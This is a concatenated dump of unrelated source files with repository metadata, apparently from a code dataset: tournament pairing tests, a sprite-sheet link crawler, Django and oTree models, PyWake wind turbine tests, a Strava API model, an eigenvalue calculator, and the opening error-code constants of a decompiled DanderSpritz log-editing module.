[(id1, name1, wins1, matches1, byes1), (id2, name2, wins2, matches2, byes2)] = standings
if matches1 != 0 or matches2 != 0 or wins1 != 0 or wins2 != 0:
raise ValueError(
"Newly registered players should have no matches or wins.")
if set([name1, name2]) != set(["Melpomene Murray", "Randy Schwartz"]):
raise ValueError("Registered players' names should appear in standings, "
"even if they have no matches played.")
print "6. Newly registered players appear in the standings with no matches."
def testReportMatches():
deleteMatches()
deletePlayers()
registerPlayer("Bruno Walton")
registerPlayer("Boots O'Neal")
registerPlayer("Cathy Burton")
registerPlayer("Diane Grant")
standings = playerStandings()
[id1, id2, id3, id4] = [row[0] for row in standings]
reportMatch(id1, id2)
reportMatch(id3, id4)
standings = playerStandings()
for (i, n, w, m, b) in standings:
if m != 1:
raise ValueError("Each player should have one match recorded.")
if i in (id1, id3) and w != 1:
raise ValueError("Each match winner should have one win recorded.")
elif i in (id2, id4) and w != 0:
raise ValueError("Each match loser should have zero wins recorded.")
if b != 0:
raise ValueError("Each player should have zero byes when there are an even number of players.")
print "7. After a match, players have updated standings."
def testPairings():
deleteMatches()
deletePlayers()
registerPlayer("Twilight Sparkle")
registerPlayer("Fluttershy")
registerPlayer("Applejack")
registerPlayer("Pinkie Pie")
standings = playerStandings()
[id1, id2, id3, id4] = [row[0] for row in standings]
reportMatch(id1, id2)
reportMatch(id3, id4)
pairings = swissPairings()
if len(pairings) != 2:
raise ValueError(
"For four players, swissPairings should return two pairs.")
[(pid1, pname1, pid2, pname2), (pid3, pname3, pid4, pname4)] = pairings
correct_pairs = set([frozenset([id1, id3]), frozenset([id2, id4])])
actual_pairs = set([frozenset([pid1, pid2]), frozenset([pid3, pid4])])
if correct_pairs != actual_pairs:
raise ValueError(
"After one match, players with one win should be paired.")
print "8. After one match, players with one win are paired."
def testBye():
deleteMatches()
deletePlayers()
registerPlayer("Twilight Sparkle")
registerPlayer("Fluttershy")
registerPlayer("Harvey Wallbanger")
standings = playerStandings()
print standings
print swissPairings()
[id1, id2, id3, id4] = [row[0] for row in standings]
reportMatch(id1, None)
print playerStandings()
def testOddPairings():
from collections import Counter
deleteMatches()
deletePlayers()
registerPlayer("Twilight Sparkle")
registerPlayer("Fluttershy")
registerPlayer("Harvey Wallbanger")
standings = playerStandings()
byes = Counter()
for row in standings:
byes[row[0]] = 0
numRounds = 4
for round in xrange(numRounds):
pairings = swissPairings()
if len(pairings) != 2:
raise ValueError(
"For three players, swissPairings should return two pairs.")
id1 = pairings[0][0]
id2 = pairings[0][2]
id3 = pairings[1][0]
id4 = pairings[1][2]
if id1 == None:
byes[id2] += 1
elif id2 == None:
byes[id1] += 1
elif id3 == None:
byes[id4] += 1
elif id4 == None:
byes[id3] += 1
else:
raise ValueError(
"For three players, there should be exactly one bye in round #{Round}.".format(Round=round))
items = byes.items()
minByes = min(items, key=lambda x: x[1])
maxByes = max(items, key=lambda x: x[1])
if maxByes[1] - minByes[1] > 1:
raise ValueError(
"In round #{Round}, no player should ever have more than one bye than any other player ({Min}, {Max})".format(Round=round, Min=minByes, Max=maxByes))
reportMatch(id1, id2)
reportMatch(id3, id4)
print "9. For {Rounds} rounds, every round has exactly one bye and no player has more than one bye than any other.".format(Rounds=numRounds)
if __name__ == '__main__':
testDeleteMatches()
testDelete()
testCount()
testRegister()
testRegisterCountDelete()
testStandingsBeforeMatches()
testReportMatches()
testPairings()
testOddPairings()
print "Success! All tests pass!"
| [
"barefootlance@gmail.com"
] | barefootlance@gmail.com |
301266cf55d4b1db72d4c34ecfe1d5c9ba8e4fbf | 27404582c847efaf9a6e19d0fa6300e387a21a1a | /spriters-resource.com/crawler.py | 9099e48c7389a96d7fe9440e2b9260a7da07e0e6 | [] | no_license | Necrno/Misc-Download-Scripts | 72a6fad8c18b621894181e94961769eaf5889987 | 8a975c4d6ed33851cc2ca842645573caff6b4a6d | refs/heads/master | 2021-05-04T12:18:54.563041 | 2017-12-27T00:10:09 | 2017-12-27T00:10:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,243 | py | import requests
import bs4
import os
headers = {
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
}
URL = "https://www.spriters-resource.com"
def get_consoles():
consoles = []
response = requests.get(URL)
soup = bs4.BeautifulSoup(response.text, "html.parser")
for console in soup.find(id="leftnav-consoles"):
if type(console) == bs4.element.Tag and console.get("href") is not None:
consoles.append((console.text, URL + console.get("href")))
return consoles
def get_games(console, letter):
games = []
print(console[0] + " - " + letter)
print(console[1] + letter + ".html")
response = requests.get(console[1] + letter + ".html")
soup = bs4.BeautifulSoup(response.text, "html.parser")
for link in soup.find_all("a"):
for child in link.findChildren():
if child.get("class") is not None and child.get("class") == ['gameiconcontainer']:
game_name = child.find("div").find("span").string
games.append((game_name, URL + link.get("href")))
return games
def get_sheets(game):
sheets = []
response = requests.get(game[1])
soup = bs4.BeautifulSoup(response.text, "html.parser")
for link in soup.find_all("a"):
for div in link.find_all("div"):
if div.get("class") == ["iconcontainer"]:
sheet_url = div.find("div", attrs={"class": "iconbody"}).find("img").get("src").replace("sheet_icons",
"sheets")
sheet_name = div.find("div").find("span").string
sheets.append((sheet_name, URL + sheet_url))
return sheets
file = open("links.txt", "w")
for console in get_consoles():
for letter in "0ABCDEFGHIJKLMNOPQRSTUVWXYZ":
for game in get_games(console, letter):
for sheet in get_sheets(game):
extension = os.path.splitext(sheet[1])[1]
file.write(console[0] + os.sep + game[0] + os.sep + sheet[0] + extension + "\0" + sheet[1] + "\n")
file.close() | [
"Anise5-humid5-Allow-5Lulu-Honk"
] | Anise5-humid5-Allow-5Lulu-Honk |
afde11cf35e41b50a17e141a35f38faa365d9ba6 | 84cc9b9b6af95b81d19eda1020f1ac97cbbfa42f | /myapp/models.py | 65909fb3ef615af0b1bebed8ba3bfb36a11f9121 | [] | no_license | YouCantTouchThis/IncognitoFIN | b91caff1b8e991263ba6c19869374f9e84ab8f48 | d99065285216bc731f6339ab9b15b1decaba1c70 | refs/heads/master | 2022-12-02T00:18:10.276649 | 2020-07-26T01:48:55 | 2020-07-26T01:48:55 | 282,555,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | from django.db import models
# Create your models here.
class Diagnosis(models.Model):
image = models.ImageField(upload_to = 'images/')
email = models.EmailField()
| [
"noreply@github.com"
] | YouCantTouchThis.noreply@github.com |
4dd2952b692d1eb7f9535151212982a8483654d6 | 0bf183f870d39037a254695b163c833512a826f8 | /wapps/migrations/0016_auto_20161024_0925.py | 5799f374b78a09d39052c63d158a41562f899572 | [
"MIT"
] | permissive | apihackers/wapps | 47c57a762aec89bc398a152763a2b26005d8ffdc | e8158747aa3d77246d41142580faf9a5f2b0d968 | refs/heads/master | 2022-06-19T19:40:28.615502 | 2018-05-02T12:42:51 | 2018-05-02T12:42:51 | 59,942,417 | 7 | 2 | MIT | 2022-05-21T21:45:25 | 2016-05-29T12:40:01 | Python | UTF-8 | Python | false | false | 723 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-24 09:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from wapps.utils import get_image_model
class Migration(migrations.Migration):
dependencies = [
('wapps', '0015_identitysettings_amp_logo'),
]
operations = [
migrations.AlterField(
model_name='identitysettings',
name='amp_logo',
field=models.ForeignKey(blank=True, help_text='An mobile optimized logo that must be 600x60', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=get_image_model(), verbose_name='Mobile Logo'),
),
]
| [
"noirbizarre@gmail.com"
] | noirbizarre@gmail.com |
12a314df473b007e01fcd646a5de9d22189aca4b | 9b7d1472086eed304320312043a95610a39baf9c | /easy_maps/migrations/0001_initial.py | 63a5e3ffb746437d92af2bbe813d7a74e7c6e4bc | [
"MIT"
] | permissive | duct-tape/django-easy-maps | 1831785952c5ef40028197d5ab618074b5a6053a | 790196fcb5652a76a64f7f513c4c4ef4a1c905df | refs/heads/master | 2020-05-28T05:14:18.312914 | 2019-04-21T04:40:29 | 2019-04-21T04:40:29 | 188,890,561 | 0 | 0 | MIT | 2019-05-27T18:20:17 | 2019-05-27T18:20:16 | null | UTF-8 | Python | false | false | 1,103 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('address', models.CharField(unique=True, max_length=255, verbose_name='address')),
('computed_address', models.CharField(max_length=255, null=True, verbose_name='computed address', blank=True)),
('latitude', models.FloatField(null=True, verbose_name='latitude', blank=True)),
('longitude', models.FloatField(null=True, verbose_name='longitude', blank=True)),
('geocode_error', models.BooleanField(default=False, verbose_name='geocode error')),
],
options={
'verbose_name': 'EasyMaps Address',
'verbose_name_plural': 'Address Geocoding Cache',
},
),
]
| [
"basil.shubin@gmail.com"
] | basil.shubin@gmail.com |
7016256f526c1ff9c4e319eff1a5613547d7df02 | 9df188d04d764638794c0a74128b1f4860a255c6 | /cspp1-practice/m9/Functions and Objects Exercise-1/Functions and Objects Exercise-1/functions_and_objects_1.py | 66d30945ad0302702084cbb8a9b43bb0de7e6376 | [] | no_license | shanmukhsurendra/CSPP1 | 815742f60de9c0374c4dcd21d9f7eb7fe30d6428 | 310be6b98c003b7f1b7c7d6e1269d18e0cef91ab | refs/heads/master | 2020-03-24T17:50:46.811931 | 2018-08-25T07:57:36 | 2018-08-25T07:57:36 | 142,873,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | #Exercise : Function and Objects Exercise-1
#Implement a function that converts the given testList = [1, -4, 8, -9] into [1, 4, 8, 9]
def apply_to_each(L, f):
j =0
for i in range(len(L)):
L[i] = f(L[i])
print(L)
def main():
data = input()
data = data.split()
list1 = []
for j in data:
list1.append(int(j))
apply_to_each(list1, abs)
if __name__ == "__main__":
main()
| [
"shanmukhsurendra@msitprogram.net"
] | shanmukhsurendra@msitprogram.net |
9ad7c88df6556a4c4f1d9aae267e3ee7998f964e | a0f8603ef5bd2c53e2efa2aaee69d37361376ac2 | /setup.py | c14b8b2cef5641749d683e19fb44f395cdd0a569 | [
"MIT"
] | permissive | ProjetPP/PPP-NaturalMath | 383dbc28f2769c020b000676afd8b7a0efb0564c | ce51865d890cb20eba78d73a362af1cb2b62002b | refs/heads/master | 2021-01-25T06:40:01.565488 | 2015-11-21T13:29:21 | 2015-11-21T13:29:21 | 29,428,678 | 2 | 1 | null | 2015-05-16T06:34:25 | 2015-01-18T14:35:50 | Python | UTF-8 | Python | false | false | 1,110 | py | #!/usr/bin/env python3
from setuptools import setup, find_packages
setup(
name='ppp_natural_math',
version='0.3',
description='Natural language processing for math questions for the Projet Pensées\nProfondes.',
url='https://github.com/ProjetPP',
author='Valentin Lorentz',
author_email='valentin.lorentz+ppp@ens-lyon.org',
license='MIT',
classifiers=[
'Environment :: No Input/Output (Daemon)',
'Development Status :: 1 - Planning',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',
'Topic :: Software Development :: Libraries',
],
install_requires=[
'ply',
'ppp_datamodel>=0.6',
'ppp_libmodule>=0.7',
],
packages=[
'ppp_natural_math',
],
)
| [
"progval@progval.net"
] | progval@progval.net |
49731a56a1cd6079a7c5e954a58e7180a399da0b | a1f47b53c2583ab94ce80431ace4ea2090142a25 | /preference_discovery/models.py | 51d89bbc8010a4543b23e01c52cbffc15f6221e2 | [
"MIT"
] | permissive | sanjiw/oTree | 0b30f6dee8b93e2eefef18d16128be5eb2a7d13b | d60ea92a1a2be3f8b650c5e1547a27a730671333 | refs/heads/master | 2023-06-06T20:37:58.462732 | 2021-07-18T14:24:39 | 2021-07-18T14:24:39 | 386,983,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,065 | py | from otree.api import (
models,
widgets,
BaseConstants,
BaseSubsession,
BaseGroup,
BasePlayer,
Currency as c,
currency_range,
)
import numpy as np
import pandas as pd
from random import sample
author = 'Putu Sanjiwacika Wibisana'
doc = """
Adaptation of Preference Discovery by Delaney, Jacobson and Moenig (2018) for risk preference discovery.
"""
class Constants(BaseConstants):
name_in_url = 'preference_discovery_v2'
players_per_group = None
num_rounds = 20
with open('preference_discovery/Lottery.csv', encoding="utf-8") as file:
prospects = pd.read_csv(file)
class Subsession(BaseSubsession):
pass
class Group(BaseGroup):
pass
class Player(BasePlayer):
def set_player_param(self):
# round settings
self.training_round = 1 if self.round_number <= self.session.config["training_rounds"] else 0
if self.round_number == 1:
self.participant.vars["prospect_table"] = Constants.prospects
self.endowment = self.session.config["endowment"]
self.participant.vars["payoff_vector"] = list()
elif self.round_number == self.session.config["training_rounds"] + 1:
self.participant.vars["prospect_table"] = Constants.prospects
#randomizer
rand = sample(list(range(0,20)),4)
rand.append(20)
self.participant.vars["random_indexes"] = rand
self.participant.vars["displayed_lotteries"] = list(self.participant.vars["prospect_table"].loc[self.participant.vars["random_indexes"],"Index"])
self.participant.vars["displayed_prospects"] = self.participant.vars["prospect_table"].loc[self.participant.vars["random_indexes"],:]
self.displayed_lotteries = str(list(self.participant.vars["displayed_lotteries"]))
def payoff_realizer(self):
df = self.participant.vars["displayed_prospects"]
df[["Allocation"]] = [self.Lotere_A, self.Lotere_B, self.Lotere_C, self.Lotere_D, self.Lotere_E] ### df[["Allocation"]] = [0,0,2,1,2]
df[["payoff"]] = [0, 0, 0, 0, 0]
for i in self.participant.vars["random_indexes"]:
df.loc[i,"A_or_B"] = np.random.choice(["A","B"], p=[df.loc[i,"p1"],df.loc[i,"p2"]])
df.loc[i,"payoff"] = df.loc[i,"x1"] * df.loc[i,"Allocation"] if df.loc[i,"A_or_B"] == "A" else df.loc[i,"x2"] * df.loc[i,"Allocation"]
self.payoff_thisround = int(df[["payoff"]].sum())
if self.training_round == False:
self.participant.vars["payoff_vector"].append(self.payoff_thisround)
self.participant.vars["prospect_table"].update(df)
for i in range(0,len(self.participant.vars["prospect_table"])):
if self.participant.vars["prospect_table"].loc[i,"A_or_B"] != "X":
if self.participant.vars["prospect_table"].loc[i,"A_or_B"] == "A":
self.participant.vars["prospect_table"].loc[i, "p1"] = 1
self.participant.vars["prospect_table"].loc[i, "p2"] = 0
elif self.participant.vars["prospect_table"].loc[i,"A_or_B"] == "B":
self.participant.vars["prospect_table"].loc[i, "p1"] = 0
self.participant.vars["prospect_table"].loc[i, "p2"] = 1
else:
pass
self.participant.vars["displayed_prospects"] = df
endowment = models.IntegerField()
payoff_thisround = models.IntegerField()
displayed_lotteries = models.StringField()
training_round = models.BooleanField()
Lotere_A = models.IntegerField(min=0, max=10, initial=0)
Lotere_B = models.IntegerField(min=0, max=10, initial=0)
Lotere_C = models.IntegerField(min=0, max=10, initial=0)
Lotere_D = models.IntegerField(min=0, max=10, initial=0)
Lotere_E = models.IntegerField(min=0, max=10, initial=0)
## Vars for questionnaire
Name = models.StringField(label="Nama Lengkap Anda:")
Age = models.IntegerField(label="Usia:", min=14, max=35)
Gender = models.StringField(label="Gender:", choices=["Pria", "Wanita"])
| [
"sanji.wibisana@gmail.com"
] | sanji.wibisana@gmail.com |
b9bcaa542c31817b3e4ff6a55070e5d1260e7a32 | a424323a34a2fc5700d690829752d3e30032a1e6 | /routelanta/swagger_client/models/error.py | dd84e74804f597df3a67e64cff493499f31707de | [] | no_license | jackrager/jackrager.github.io | 884747803fa44063372efdbf46e36e979474d2fe | 50b9b62ca7a7fae6744796c1aa032f16cfad5898 | refs/heads/master | 2023-03-09T22:08:53.059755 | 2023-02-20T22:30:23 | 2023-02-20T22:30:23 | 228,740,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,230 | py | # coding: utf-8
"""
Strava API v3
The [Swagger Playground](https://developers.strava.com/playground) is the easiest way to familiarize yourself with the Strava API by submitting HTTP requests and observing the responses before you write any client code. It will show what a response will look like with different endpoints depending on the authorization scope you receive from your athletes. To use the Playground, go to https://www.strava.com/settings/api and change your “Authorization Callback Domain” to developers.strava.com. Please note, we only support Swagger 2.0. There is a known issue where you can only select one scope at a time. For more information, please check the section “client code” at https://developers.strava.com/docs. # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Error(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'code': 'str',
'field': 'str',
'resource': 'str'
}
attribute_map = {
'code': 'code',
'field': 'field',
'resource': 'resource'
}
def __init__(self, code=None, field=None, resource=None): # noqa: E501
"""Error - a model defined in Swagger""" # noqa: E501
self._code = None
self._field = None
self._resource = None
self.discriminator = None
if code is not None:
self.code = code
if field is not None:
self.field = field
if resource is not None:
self.resource = resource
@property
def code(self):
"""Gets the code of this Error. # noqa: E501
The code associated with this error. # noqa: E501
:return: The code of this Error. # noqa: E501
:rtype: str
"""
return self._code
@code.setter
def code(self, code):
"""Sets the code of this Error.
The code associated with this error. # noqa: E501
:param code: The code of this Error. # noqa: E501
:type: str
"""
self._code = code
@property
def field(self):
"""Gets the field of this Error. # noqa: E501
The specific field or aspect of the resource associated with this error. # noqa: E501
:return: The field of this Error. # noqa: E501
:rtype: str
"""
return self._field
@field.setter
def field(self, field):
"""Sets the field of this Error.
The specific field or aspect of the resource associated with this error. # noqa: E501
:param field: The field of this Error. # noqa: E501
:type: str
"""
self._field = field
@property
def resource(self):
"""Gets the resource of this Error. # noqa: E501
The type of resource associated with this error. # noqa: E501
:return: The resource of this Error. # noqa: E501
:rtype: str
"""
return self._resource
@resource.setter
def resource(self, resource):
"""Sets the resource of this Error.
The type of resource associated with this error. # noqa: E501
:param resource: The resource of this Error. # noqa: E501
:type: str
"""
self._resource = resource
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Error, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Error):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"noreply@github.com"
] | jackrager.noreply@github.com |
063b6bc5559dd6534df902d9ab972ce7ecf6bd79 | 805d9859e85321e6b0a87b3f6fd4b2bf765bc8ee | /Python/Dictionary.py | 4c616f7850fd469d2516169036298cc35e03ce79 | [] | no_license | aaka2409/HacktoberFest2020 | eb6b312555b046b6382cee106b7869d5a36cfe9d | f348e60c2c58c99c20207094b8351aa15b319285 | refs/heads/master | 2023-08-26T01:19:49.058021 | 2021-10-25T09:48:24 | 2021-10-25T09:48:24 | 420,963,776 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | #Dictionary
#beginner
pydic = {
"apple" : "a fruit, usually green or red in color. The one Eve ate.",
"lebanon" : "the place that got blasted a few weeks ago.",
"pandemic" : "a new word nigerian youths learnt because of corona virus",
"ncdc" : "a governemental parastatal we just heard about, as per covid.",
"nddc" : "a governemtal parastatal that has been embezzling since the ages.",
}
print('Welcome to PyDic')
keyword = input('Enter Word to be searched: ')
print('Searching..........')
if keyword in pydic:
print(pydic[keyword])
else:
print('Sorry. Word not in pyDic') | [
"ayfolut@gmail.com"
] | ayfolut@gmail.com |
ee0efe58c5e34175fd2e94f5aa392806a29802d3 | 3d1b3826fba898f738d2cd4345275d8f3536429d | /eigen_value_calculator_3x3.py | 263c44bc5b8606e4440e138ccd81bb1795064cbc | [] | no_license | rushil180101/eigen-value-calculator-script | 8f45a4ac660e8822ec84f46a53e841adc1b8edfa | 7700e3b79d1ecbd0fd99a27b476b96397a0d3909 | refs/heads/main | 2023-08-15T10:04:01.404297 | 2021-10-11T10:43:45 | 2021-10-11T10:43:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,707 | py | # Eigen Values Calculator
import math
A = []
print('Enter the values of 3x3 matrix')
# Input the matrix values.
for i in range(3):
row = []
for j in range(3):
row.append(int(input()))
A.append(row)
# Print the matrix for better visualization.
print('\n Matrix')
for i in range(len(A)):
for j in range(len(A[i])):
print('%4d' % (A[i][j]), end=' ')
print()
# Sum of diagonal elements.
s1 = A[0][0] + A[1][1] + A[2][2]
# Sum of diagonal minors.
s2 = (A[1][1]*A[2][2] - A[1][2]*A[2][1]) + \
(A[0][0]*A[2][2] - A[0][2]*A[2][0]) + \
(A[0][0]*A[1][1] - A[0][1]*A[1][0])
# Determinant of matrix.
determinant = (A[0][0]*(A[1][1]*A[2][2] - A[1][2]*A[2][1])) - \
(A[0][1]*(A[1][0]*A[2][2] - A[1][2]*A[2][0])) + \
(A[0][2]*(A[1][0]*A[2][1] - A[1][1]*A[2][0]))
# Characteristic Equation.
equation = '(lambda^3) - (' + str(s1) + ')*(lambda^2) + (' + \
str(s2) + ')*(lambda) - (' + str(determinant) + ') = 0'
print('\nCharacteristic Equation : ', equation)
# Find the roots of cubic equation, which are ultimately the eigen values.
if determinant == 0:
# If determinant is 0 then one root is 0 and we find other two roots.
roots = [0]
try:
a = 1
b = -s1
c = s2
root2 = (-b + math.sqrt(b * b - 4 * a * c)) / (2 * a)
root3 = (-b - math.sqrt(b * b - 4 * a * c)) / (2 * a)
roots.extend([root2, root3])
except Exception as e:
print('Eigen Values do not exist or are not real numbers.')
exit(0)
else:
try:
# Find the factors of determinant.
x = [i for i in range(1, abs(determinant)+1) if determinant % i == 0]
# Also include negative values of the factors.
# For example, if the factors are [1, 2, 3]
# then also include [-1, -2, -3] to form [1, 2, 3, -1, -2, -3].
x.extend([-i for i in x])
roots = []
for lambda_ in x:
eqn = math.pow(lambda_, 3) - s1*math.pow(lambda_, 2) + s2*lambda_ \
- determinant
if eqn == 0.00:
roots.append(lambda_)
# If there is at least one root, then calculate other two roots.
if len(roots) < 3:
root1 = roots[0]
c = determinant/root1
a = 1
b = (s2 - c)/-root1
root2 = (-b + math.sqrt(b * b - 4 * a * c)) / (2*a)
root3 = (-b - math.sqrt(b * b - 4 * a * c)) / (2*a)
roots = [root1, root2, root3]
except Exception as e:
print('Eigen Values do not exist or are not real numbers.')
exit(0)
eigen_values = roots
print('\nEigen Values of the given matrix are : ', eigen_values)
| [
"rushil180101@gmail.com"
] | rushil180101@gmail.com |
64ccdd263ca98e95b24a5cf753dcf440d430245d | 10e1a046d2fb02d0742364c5d2ca3a40f9380416 | /py_wake/tests/test_windturbines/test_generic_wind_turbines.py | 0dec1eb35265b6ee19a256e891ed3db51e58c090 | [
"MIT"
] | permissive | Bowen-Du/PyWake | e1c407d4ff20101c95c28cd856faec729b414320 | 9a3c9a85f50082da01286b2dc8551a4e8f5fc037 | refs/heads/master | 2023-06-10T20:36:00.213649 | 2021-07-02T11:43:51 | 2021-07-02T13:14:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,371 | py | from py_wake.examples.data.hornsrev1 import V80, Hornsrev1Site
from py_wake.wind_turbines._wind_turbines import WindTurbine
from py_wake.wind_turbines.generic_wind_turbines import GenericWindTurbine, GenericTIRhoWindTurbine
from py_wake.examples.data import wtg_path
from py_wake.examples.data.dtu10mw import DTU10MW
import numpy as np
import matplotlib.pyplot as plt
from py_wake.tests import npt
import pytest
from py_wake.deficit_models.noj import NOJ
from py_wake.site.xrsite import XRSite
def test_GenericWindTurbine():
for ref, ti, p_tol, ct_tol in [(V80(), .1, 0.03, .16),
(WindTurbine.from_WAsP_wtg(wtg_path + "Vestas V112-3.0 MW.wtg"), .05, 0.035, .07),
(DTU10MW(), .05, 0.06, .13)]:
power_norm = ref.power(np.arange(10, 20)).max()
wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
turbulence_intensity=ti, ws_cutin=None)
if 0:
u = np.arange(0, 30, .1)
p, ct = wt.power_ct(u)
plt.plot(u, p / 1e6, label='Generic')
plt.plot(u, ref.power(u) / 1e6, label=ref.name())
plt.ylabel('Power [MW]')
plt.legend()
ax = plt.twinx()
ax.plot(u, ct, '--')
ax.plot(u, ref.ct(u), '--')
plt.ylabel('Ct')
plt.show()
u = np.arange(5, 25)
p, ct = wt.power_ct(u)
p_ref, ct_ref = ref.power_ct(u)
# print(np.abs(p_ref - p).max() / power_norm)
npt.assert_allclose(p, p_ref, atol=power_norm * p_tol)
# print(np.abs(ct_ref - ct).max())
npt.assert_allclose(ct, ct_ref, atol=ct_tol)
@pytest.mark.parametrize(['power_idle', 'ct_idle'], [(0, 0), (100, .1)])
def test_GenericWindTurbine_cut_in_out(power_idle, ct_idle):
ref = V80()
power_norm = ref.power(15)
wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
turbulence_intensity=0, ws_cutin=3, ws_cutout=25, power_idle=power_idle, ct_idle=ct_idle)
if 0:
u = np.arange(0, 30, .1)
p, ct = wt.power_ct(u)
plt.plot(u, p / 1e6, label='Generic')
plt.plot(u, ref.power(u) / 1e6, label=ref.name())
plt.ylabel('Power [MW]')
plt.legend()
ax = plt.twinx()
ax.plot(u, ct, '--')
ax.plot(u, ref.ct(u), '--')
plt.ylabel('Ct')
plt.show()
assert wt.ct(2.9) == ct_idle
assert wt.power(2.9) == power_idle
assert wt.ct(25.1) == ct_idle
assert wt.power(25.1) == power_idle
def test_GenericTIRhoWindTurbine():
wt = GenericTIRhoWindTurbine('2MW', 80, 70, 2000, )
ws_lst = [11, 11, 11]
ti_lst = [0, .1, .2]
p11, ct11 = wt.power_ct(ws=ws_lst, TI_eff=ti_lst, Air_density=1.225)
p11 /= 1e6
if 0:
u = np.arange(3, 28, .1)
ax1 = plt.gca()
ax2 = plt.twinx()
for ti in ti_lst:
p, ct = wt.power_ct(u, TI_eff=ti, Air_density=1.225)
ax1.plot(u, p / 1e6, label='TI=%f' % ti)
ax2.plot(u, ct, '--')
ax1.plot(ws_lst, p11, '.')
ax2.plot(ws_lst, ct11, 'x')
print(p11.tolist())
print(ct11.tolist())
ax1.legend()
ax1.set_ylabel('Power [MW]')
ax2.set_ylabel('Ct')
plt.show()
npt.assert_array_almost_equal([1.833753, 1.709754, 1.568131], p11)
npt.assert_array_almost_equal([0.793741, 0.694236, 0.544916], ct11)
ws_lst = [10] * 3
rho_lst = [0.9, 1.225, 1.5]
p10, ct10 = wt.power_ct(ws=ws_lst, TI_eff=0.1, Air_density=rho_lst)
p10 /= 1e6
if 0:
u = np.arange(3, 28, .1)
ax1 = plt.gca()
ax2 = plt.twinx()
for rho in rho_lst:
p, ct = wt.power_ct(u, TI_eff=0.1, Air_density=rho)
ax1.plot(u, p / 1e6, label='Air density=%f' % rho)
ax2.plot(u, ct, '--')
ax1.plot(ws_lst, p10, '.')
ax2.plot(ws_lst, ct10, 'x')
print(p10.tolist())
print(ct10.tolist())
ax1.legend()
ax1.set_ylabel('Power [MW]')
ax2.set_ylabel('Ct')
plt.show()
npt.assert_array_almost_equal([1.040377569594173, 1.3934596754744593, 1.6322037609434554], p10)
npt.assert_array_almost_equal([0.7987480617157162, 0.7762418395479502, 0.7282996179383272], ct10)
| [
"mmpe@dtu.dk"
] | mmpe@dtu.dk |
01d3ab118c111cade14811b445555a634d2d86f8 | 2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac | /Dsz/PyScripts/Lib/dsz/mca/file/cmd/logedit/errors.py | 9078f31a6058462a9312fcb46aac6150a7228736 | [] | no_license | FingerLeakers/DanderSpritz_docs | f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364 | d96b6a71c039b329f9f81544f645857c75360e7f | refs/heads/master | 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null | UTF-8 | Python | false | false | 1,344 | py | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: errors.py
import mcl.status
ERR_SUCCESS = mcl.status.MCL_SUCCESS
ERR_INVALID_PARAM = mcl.status.framework.ERR_START
ERR_MARSHAL_FAILED = mcl.status.framework.ERR_START + 1
ERR_GET_FULL_PATH_FAILED = mcl.status.framework.ERR_START + 2
ERR_OPENFILE_FAILED = mcl.status.framework.ERR_START + 3
ERR_ALLOC_FAILED = mcl.status.framework.ERR_START + 4
ERR_WRITE_FILE_FAILED = mcl.status.framework.ERR_START + 5
ERR_UNICODE_NOT_SUPPORTED = mcl.status.framework.ERR_START + 6
ERR_NO_GOOD_LINES_FOUND = mcl.status.framework.ERR_START + 7
ERR_NO_MATCHING_LINES_FOUND = mcl.status.framework.ERR_START + 8
errorStrings = {ERR_INVALID_PARAM: 'Invalid parameter(s)',
